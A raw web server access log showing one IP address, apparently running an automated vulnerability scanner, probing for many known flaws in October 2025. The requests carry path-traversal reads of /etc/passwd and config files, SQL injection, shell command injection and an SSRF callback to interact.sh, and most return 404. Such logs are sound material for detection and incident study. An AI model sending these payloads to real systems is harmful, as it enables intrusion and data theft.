205.185.122.202 - - [19/Oct/2025:21:29:13 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:29:14 +0530] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:29:17 +0530] "GET /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b9535419*8514933%7d HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:29:18 +0530] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:29:20 +0530] "GET /itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:21:29:21 +0530] "GET /mas/sysinfo/testCommandExecutor.jsp?cmdLine=type%201295824%20+%202468433&workDir=&pathEnv=&libPathEnv= HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:29:23 +0530] "POST /scripts/setup.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:29:25 +0530] "POST /web/storage/raid_cgi.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:29:28 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:29:29 +0530] "POST /fileupload/toolsAny HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:29:29 +0530] "POST /fileupload/toolsAny HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:29:31 +0530] "GET /user.php?act=collection_list HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:29:32 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:29:33 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:29:33 +0530] "GET /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:29:36 +0530] "POST /passwordrecovered.cgi?id=get_rekt HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:29:37 +0530] "POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=qjnimgnkehsasklyclhh.jsp&filename=1.jpg HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:29:39 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:29:40 +0530] "GET /rest/api/2/user/picker?query=flkyovxu HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:29:43 +0530] "POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:29:43 +0530] "POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:29:44 +0530] "POST /ioffice/prg/set/wss/ioAssistance.asmx HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:29:47 +0530] "GET /login.html HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:29:48 +0530] "GET /public/login.htm?type=version HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:29:50 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:29:50 +0530] "GET /eam/vib?id=/etc/passwd HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:29:51 +0530] "GET /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.1" 404 1158
205.185.122.202 - - [19/Oct/2025:21:29:54 +0530] "GET /index.php?c=api&a=down&file=NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQs HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:29:54 +0530] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:29:57 +0530] "GET /api/proxy/tcp HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:29:57 +0530] "GET /api/proxy/tcp HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:29:58 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:30:01 +0530] "GET /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' null" 400 -
205.185.122.202 - - [19/Oct/2025:21:30:02 +0530] "POST /druid/indexer/v1/sampler HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:30:05 +0530] "GET /Server/CmxUser.php?pgid=UserList HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:30:05 +0530] "POST /?q=node&destination=node HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:30:07 +0530] "POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:30:08 +0530] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:30:10 +0530] "GET /conf/nginx.conf HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:30:10 +0530] "GET /conf/fastcgi.conf HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:30:11 +0530] "POST /register.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:30:13 +0530] "GET /live_check.shtml HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:30:15 +0530] "GET /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b9902513*8132205%7d HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:30:18 +0530] "GET /forum/?subscribe_topic=1 HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:30:19 +0530] "GET /itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:21:30:22 +0530] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(76003),null,null%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:30:23 +0530] "POST /scripts/setup.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:30:26 +0530] "GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:30:27 +0530] "GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../Web.Config HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:30:28 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:30:31 +0530] "GET /embed.js HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:30:32 +0530] "GET /user.php?act=collection_list HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:30:37 +0530] "POST /ws.php?format=json&method=pwg.users.getList HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:30:40 +0530] "POST /passwordrecovered.cgi?id=get_rekt HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:30:43 +0530] "GET /agc/vicidial_mysqli_errors.txt HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:30:45 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:30:48 +0530] "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:30:50 +0530] "POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:30:50 +0530] "POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:30:52 +0530] "GET /web/jquery/uploader/multi_uploadify.php?status=1 HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:30:54 +0530] "GET /login.html HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:30:56 +0530] "GET /zentao/www/api-getModel-api-sql-sql=select+md5(23099146),password+from+zt_user HTTP/1.1" 404 1150
205.185.122.202 - - [19/Oct/2025:21:30:57 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:30:57 +0530] "GET /eam/vib?id=/etc/passwd HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:30:59 +0530] "GET /index.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:31:00 +0530] "GET /index.php?c=api&a=down&file=NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQs HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:31:02 +0530] "GET /api/whoami HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:31:03 +0530] "GET /api/proxy/tcp HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:31:03 +0530] "GET /api/proxy/tcp HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:31:05 +0530] "GET /logincheck_new.php?UNAME=admin HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:31:06 +0530] "GET /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' null" 400 -
205.185.122.202 - - [19/Oct/2025:21:31:09 +0530] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%20/etc/passwd&curpath=/¤tsetting.htm=1 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:31:10 +0530] "GET /Server/CmxUser.php?pgid=UserList HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:31:12 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:31:14 +0530] "POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:31:16 +0530] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:31:17 +0530] "GET /conf/nginx.conf HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:31:17 +0530] "GET /conf/fastcgi.conf HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:31:19 +0530] "GET /language/lang HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:31:21 +0530] "GET /live_check.shtml HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:31:25 +0530] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=%d&type_id=1&list[select]=extractvalue(1,concat(0x7e,(select%20md5(206066555)),0x7e)) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:31:26 +0530] "GET /forum/?subscribe_topic=1 HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:31:28 +0530] "GET /../conf/config.properties HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:31:29 +0530] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(75321),null,null%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:31:32 +0530] "POST /cgi-bin/webproc HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:31:33 +0530] "GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:31:33 +0530] "GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../Web.Config HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:31:35 +0530] "GET /api/ping?count=5&host=;echo%20$(expr%20839158923%20%2b%20804098819):839158923:839158923;&port=80&source=1.1.1.1&type=icmp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:31:36 +0530] "GET /embed.js HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:31:40 +0530] "POST /cgi-bin/nightled.cgi HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:31:41 +0530] "POST /ws.php?format=json&method=pwg.users.getList HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:31:43 +0530] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:31:43 +0530] "GET /base_import/static/etc/passwd HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:31:43 +0530] "GET /agc/vicidial_mysqli_errors.txt HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:31:45 +0530] "GET /Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:31:46 +0530] "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:31:49 +0530] "GET /seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../¤tUserName=admin¤tUserId=1&isWebReport=true HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:31:50 +0530] "GET /web/jquery/uploader/multi_uploadify.php?status=1 HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:31:53 +0530] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:31:55 +0530] "GET /zentao/www/api-getModel-api-sql-sql=select+md5(27383174),password+from+zt_user HTTP/1.1" 404 1150
205.185.122.202 - - [19/Oct/2025:21:31:58 +0530] "GET /files/ldap.debug.txt HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:31:59 +0530] "GET /index.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:32:03 +0530] "GET /@fs/etc/passwd HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:32:04 +0530] "GET /@fs/windows/win.ini HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:32:05 +0530] "GET /api/whoami HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:32:07 +0530] "POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:32:07 +0530] "GET /logincheck_new.php?UNAME=admin HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:32:08 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:32:09 +0530] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%20/etc/passwd&curpath=/¤tsetting.htm=1 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:32:12 +0530] "POST /.%0D./.%0D./.%0D./.%0D./bin/sh%20HTTP/1.0 HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:32:13 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:32:15 +0530] "GET /login/index HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:32:16 +0530] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:32:18 +0530] "GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:32:18 +0530] "GET /language/lang HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:32:21 +0530] "GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:32:22 +0530] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=%d&type_id=1&list[select]=extractvalue(1,concat(0x7e,(select%20md5(203879505)),0x7e)) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:32:25 +0530] "POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:21:32:27 +0530] "GET /../conf/config.properties HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:32:29 +0530] "GET /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5(2022658743))%23 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:32:31 +0530] "POST /cgi-bin/webproc HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:32:33 +0530] "GET /password.jsn HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:32:34 +0530] "GET /api/ping?count=5&host=;echo%20$(expr%20992453195%20%2b%20883561977):992453195:992453195;&port=80&source=1.1.1.1&type=icmp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:32:38 +0530] "GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:32:40 +0530] "POST /cgi-bin/nightled.cgi HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:32:44 +0530] "GET /view/action/download_file.php?filename=download_file.php&savename=81698 HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:32:45 +0530] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:32:45 +0530] "GET /base_import/static/etc/passwd HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:32:48 +0530] "GET /was5/web HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:32:49 +0530] "GET /Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:32:52 +0530] "GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','9463')),db_name(1),5,6,7 HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:21:32:53 +0530] "GET /seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../¤tUserName=admin¤tUserId=1&isWebReport=true HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:32:57 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:32:58 +0530] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:33:03 +0530] "GET /objects/getImageMP4.php?base64Url=YGVjaG8gZHFnYmpham4gPiBsbXRiLnR4dGA%3D&format=jpg HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:33:03 +0530] "GET /files/ldap.debug.txt HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:33:05 +0530] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:33:06 +0530] "GET /@fs/etc/passwd HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:33:06 +0530] "GET /@fs/windows/win.ini HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:33:09 +0530] "GET /agentLogUploader HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:33:09 +0530] "POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:33:12 +0530] "GET /htmltopdf/downfile.php?filename=/windows/win.ini HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:33:12 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:33:14 +0530] "GET /data/mysql_error_trace.inc HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:33:16 +0530] "POST /.%0D./.%0D./.%0D./.%0D./bin/sh%20HTTP/1.0 HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:33:19 +0530] "POST /seeyon/management/index.jsp HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:33:20 +0530] "GET /login/index HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:33:22 +0530] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:33:23 +0530] "GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:33:26 +0530] "GET /setup/setup-datasource-standard.jsp HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:33:26 +0530] "GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:33:29 +0530] "GET /iclock/ccccc/windows/win.ini HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:33:30 +0530] "POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:21:33:32 +0530] "GET /dumpmdm.cmd HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:33:33 +0530] "GET /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5(2019034474))%23 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:33:35 +0530] "GET /web.config.i18n.ashx?l=dgievd&v=dgievd HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:33:35 +0530] "GET /SWNetPerfMon.db.i18n.ashx?l=dgievd&v=dgievd HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:33:35 +0530] "GET /password.jsn HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:33:37 +0530] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:21:33:38 +0530] "GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:33:42 +0530] "POST /mobile/browser/WorkflowCenterTreeData.jsp HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:33:43 +0530] "GET /view/action/download_file.php?filename=download_file.php&savename=64724 HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:33:49 +0530] "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:33:50 +0530] "GET /was5/web HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:33:53 +0530] "GET /cache/backup/ HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:33:54 +0530] "GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','9764')),db_name(1),5,6,7 HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:21:33:57 +0530] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31 HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:33:58 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:34:01 +0530] "POST /extend/Qcloud/Sms/Sms.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:34:02 +0530] "GET /objects/getImageMP4.php?base64Url=YGVjaG8gcXVmcXhoeHYgPiB1Zm5nLnR4dGA%3D&format=jpg HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:34:04 +0530] "GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:34:05 +0530] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:34:08 +0530] "POST /photo/p/api/album.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:34:08 +0530] "GET /agentLogUploader HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:34:10 +0530] "GET /defaultroot/officeserverservlet HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:34:11 +0530] "GET /htmltopdf/downfile.php?filename=/windows/win.ini HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:34:13 +0530] "GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:34:13 +0530] "GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:34:14 +0530] "GET /data/mysql_error_trace.inc HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:34:16 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:34:16 +0530] "POST /seeyon/management/index.jsp HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:34:19 +0530] "POST /install.php?finish HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:34:20 +0530] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:34:23 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:34:24 +0530] "GET /setup/setup-datasource-standard.jsp HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:34:27 +0530] "POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:34:28 +0530] "GET /iclock/ccccc/windows/win.ini HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:34:31 +0530] "GET /..%2fconf/nhttpd.conf HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:34:32 +0530] "GET /dumpmdm.cmd HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:34:35 +0530] "GET /s/opentsdb_header.jpg HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:34:36 +0530] "GET /web.config.i18n.ashx?l=ivolfh&v=ivolfh HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:34:36 +0530] "GET /SWNetPerfMon.db.i18n.ashx?l=ivolfh&v=ivolfh HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:34:39 +0530] "POST /api/v1/user/login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:34:40 +0530] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:21:34:43 +0530] "GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:21:34:44 +0530] "POST /mobile/browser/WorkflowCenterTreeData.jsp HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:34:49 +0530] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:34:50 +0530] "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:34:54 +0530] "GET /plugin.php?id=wechat:wechat&ac=wxregister HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:34:55 +0530] "GET /cache/backup/ HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:34:58 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:34:59 +0530] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31 HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:35:03 +0530] "POST /rest/beta/repositories/go/group HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:35:03 +0530] "POST /extend/Qcloud/Sms/Sms.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:35:06 +0530] "GET /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5(208465408),7-- HTTP/1.1" 404 1068
